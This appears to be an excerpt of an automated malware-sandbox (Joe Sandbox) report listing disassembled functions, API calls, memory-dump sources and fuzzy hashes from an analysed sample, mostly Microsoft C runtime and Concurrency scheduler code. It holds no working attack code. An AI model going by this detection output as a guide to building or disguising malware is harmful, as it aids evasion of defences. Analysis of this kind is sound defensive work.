                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004328F4
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432907
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432954
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: 3f1873845dbcbd1064d3a19cd28863eec2e57fe1390348ff4fb73f67cee00bd1
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 3F81B234900249ABDF1AEF95CA41BBF7B71AF09308F04509AEC407B352C7BA8D15DB69
                    Function 044E4855 Relevance: 22.7, APIs: 15, Instructions: 189timeregistryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E485C
                    • ListArray.LIBCONCRT ref: 044E48AF
                      • Part of subcall function 044E4690: RtlInitializeSListHead.NTDLL(?), ref: 044E475C
                      • Part of subcall function 044E4690: RtlInitializeSListHead.NTDLL(?), ref: 044E4766
                    • ListArray.LIBCONCRT ref: 044E48E3
                    • Hash.LIBCMT ref: 044E494C
                    • Hash.LIBCMT ref: 044E495C
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E49F1
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E49FE
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E4A0B
                    • RtlInitializeSListHead.NTDLL(?), ref: 044E4A18
                      • Part of subcall function 044E9FB8: std::bad_exception::bad_exception.LIBCMT ref: 044E9FDA
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 044E4AA0
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044E4AC2
                    • GetLastError.KERNEL32(044E5802,?,?,00000000,?,?), ref: 044E4AD4
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 044E4AF1
                      • Part of subcall function 044DFF21: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,044E5802,00000008,?,044E4AF6,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 044DFF39
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E4B1B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID:
                    • API String ID: 1224710184-0
                    • Opcode ID: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction ID: 5acd6274126368684077a89ae294068d52061f0915fc0276fbbd157865673efc
                    • Opcode Fuzzy Hash: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction Fuzzy Hash: 75814FB0A11A12FAEB14DF76C844BE9FBA8BF08705F00421FE52997281DBB4B554CBD1
                    Function 044E2BA9 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044E2BB8
                      • Part of subcall function 044E3EA3: GetVersionExW.KERNEL32(?), ref: 044E3EC7
                      • Part of subcall function 044E3EA3: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 044E3F66
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2BCC
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2BED
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C56
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C8A
                      • Part of subcall function 044E0B64: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 044E0B84
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2D0A
                      • Part of subcall function 044E26D3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 044E26E7
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D52
                      • Part of subcall function 044E0B39: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E0B55
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D66
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 044E2D77
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E2DC4
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2DE9
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044E2DF5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 4b95f79132a2678dbce4884dd7d0928f139ca466e2f31379d8b5a959242d2a80
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 90819D31A005268FDF18DFABD8909BEB7B9BB48306B5441BFD442A7740E7F0A941CB85
                    Function 00422942 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422951
                      • Part of subcall function 00423C3C: GetVersionExW.KERNEL32(?), ref: 00423C60
                      • Part of subcall function 00423C3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423CFF
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422965
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422986
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004229EF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422A23
                      • Part of subcall function 004208FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042091D
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422AA3
                      • Part of subcall function 0042246C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422480
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AEB
                      • Part of subcall function 004208D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004208EE
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AFF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422B10
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422B5D
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422B82
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 3497a36c357a9217bd5ea5df72823c379328e9b881d8ed218cbe5642490ce89b
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 4881C431B00626ABCB18DFA9EA9057EBBF1BB48304B94413FD441A7751EBF86941CB4D
                    Function 0043F402 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0043F446
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043EFFC
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F00E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F020
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F032
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F044
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F056
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F068
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F07A
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F08C
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F09E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0B0
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0C2
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0D4
                    • _free.LIBCMT ref: 0043F43B
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F45D
                    • _free.LIBCMT ref: 0043F472
                    • _free.LIBCMT ref: 0043F47D
                    • _free.LIBCMT ref: 0043F49F
                    • _free.LIBCMT ref: 0043F4B2
                    • _free.LIBCMT ref: 0043F4C0
                    • _free.LIBCMT ref: 0043F4CB
                    • _free.LIBCMT ref: 0043F503
                    • _free.LIBCMT ref: 0043F50A
                    • _free.LIBCMT ref: 0043F527
                    • _free.LIBCMT ref: 0043F53F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: dbd078dc2a70aa704cf8e78683bcdcdf520610d7d758412ab309d08eef7ce9b5
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: FC318271940300AFDB219A39D806B5773E5AF18314F14642FE094DB292DF3CEC588B29
                    Function 004353B6 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004354B1
                    • type_info::operator==.LIBVCRUNTIME ref: 004354D8
                    • ___TypeMatch.LIBVCRUNTIME ref: 004355E4
                    • CatchIt.LIBVCRUNTIME ref: 00435639
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004356BF
                    • _UnwindNestedFrames.LIBCMT ref: 00435746
                    • CallUnexpected.LIBVCRUNTIME ref: 00435761
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm$$5
                    • API String ID: 4234981820-3170930526
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 2765267077130b143c7d318870dfd271b72c56ee2a1170d1c4f92d41ddd0a8a9
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 02C19E71800A09EFCF29DFA5C8819AEBBB5BF18315F54505BE8156B301C339EA51CF99
                    Function 0041FB81 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423CF6), ref: 0041FB8F
                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FB9D
                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FBAB
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FBD9
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FBF4
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FC00
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC16
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                    • API String ID: 1654681794-465693683
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 2faeb71938919a1c0d9ecc2d1d00a42f8f566497dce8370ae698b9c1d05c50ed
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: DA01C879604321AF97002BB9BC49FEB36ACA904716720043BF901D1293FE7CD849976C
                    Function 044F561D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044F5718
                    • type_info::operator==.LIBVCRUNTIME ref: 044F573F
                    • ___TypeMatch.LIBVCRUNTIME ref: 044F584B
                    • CatchIt.LIBVCRUNTIME ref: 044F58A0
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044F5926
                    • _UnwindNestedFrames.LIBCMT ref: 044F59AD
                    • CallUnexpected.LIBVCRUNTIME ref: 044F59C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 0873f9aa0d961ecb26d42811d12a6ed10da543ec0d5eb94e473432344c165ae3
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 18C16971900209EFDF29DFA5CC80AAEBBB5AF04325F04455BEA15AB613D331E961CF91
                    Function 044F2CE5 Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044F2CF7
                      • Part of subcall function 044F2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044F2D18
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044F2D25
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044F2D73
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 044F2E1B
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 044F2E4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 8599192e05db3774e8ed71f114933a526e4f2d78e22d82021a90c133ee6f415b
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: D8719F70900249ABEF15CF54CD80ABF7BB5BF45308F04409AEE516B392C7B7A916DB61
                    Function 00432A7E Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432A90
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432AB1
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432ABE
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00432B0C
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432BB4
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432BE6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 5e49a0710176f9ffb610bd551467bf7c1da036f6e9237cc3336f808c64588d21
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: 99719030900209ABDF15DF54DA41ABFBBB2AF49304F04609AEC416B352C7B9DD16DB69
                    Function 044EEDA1 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEDF1
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044EEE0A
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEE20
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 044EEE8D
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 044EEE95
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EEEBC
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 044EEEC8
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 044EEF00
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EEF1F
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 044EEF2D
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 044EEF54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 3608406545-0
                    • Opcode ID: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction ID: 38412557e607bad89b578066e25817cfe9d7c6ae2eeabce4698f2ce9e294d7e0
                    • Opcode Fuzzy Hash: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction Fuzzy Hash: 235161347002049FEF14EF6AC485BB977A5EF49316F2544AAED499B387CB70B8058BA1
                    Function 044E6D51 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044E6D96
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044E6DC8
                    • List.LIBCONCRT ref: 044E6E03
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044E6E14
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044E6E30
                    • List.LIBCONCRT ref: 044E6E6B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044E6E7C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E6E97
                    • List.LIBCONCRT ref: 044E6ED2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044E6EDF
                      • Part of subcall function 044E6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E626E
                      • Part of subcall function 044E6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044E6280
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 5c67d7d1d9c5343e1979e255585ff62b89e27ba7486ac471fbc1c7b5f45e65ea
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: C8514E71A00219AFEF14DF56C494BFEB7A8BF18309F85406AD905AB381DB70BE05CB90
                    Function 00426AEA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426B2F
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426B61
                    • List.LIBCONCRT ref: 00426B9C
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426BAD
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426BC9
                    • List.LIBCONCRT ref: 00426C04
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426C15
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426C30
                    • List.LIBCONCRT ref: 00426C6B
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426C78
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426007
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426019
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 37c50e48faffa15a5835890cc86fa27e9627dd6e10cbd905bce2715576e74200
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 86517071B00229ABDB04DF55D595BEEB7B8FF08304F4140AAE9459B381DB38AE44CB94
                    Function 044FA860 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 044FA876
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FA882
                    • _free.LIBCMT ref: 044FA88D
                    • _free.LIBCMT ref: 044FA898
                    • _free.LIBCMT ref: 044FA8A3
                    • _free.LIBCMT ref: 044FA8AE
                    • _free.LIBCMT ref: 044FA8B9
                    • _free.LIBCMT ref: 044FA8C4
                    • _free.LIBCMT ref: 044FA8CF
                    • _free.LIBCMT ref: 044FA8DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: 8496a25e7dc5c30d1fd9ca2af2a32419cce2ada4776ae8663ea3a11652eacd4b
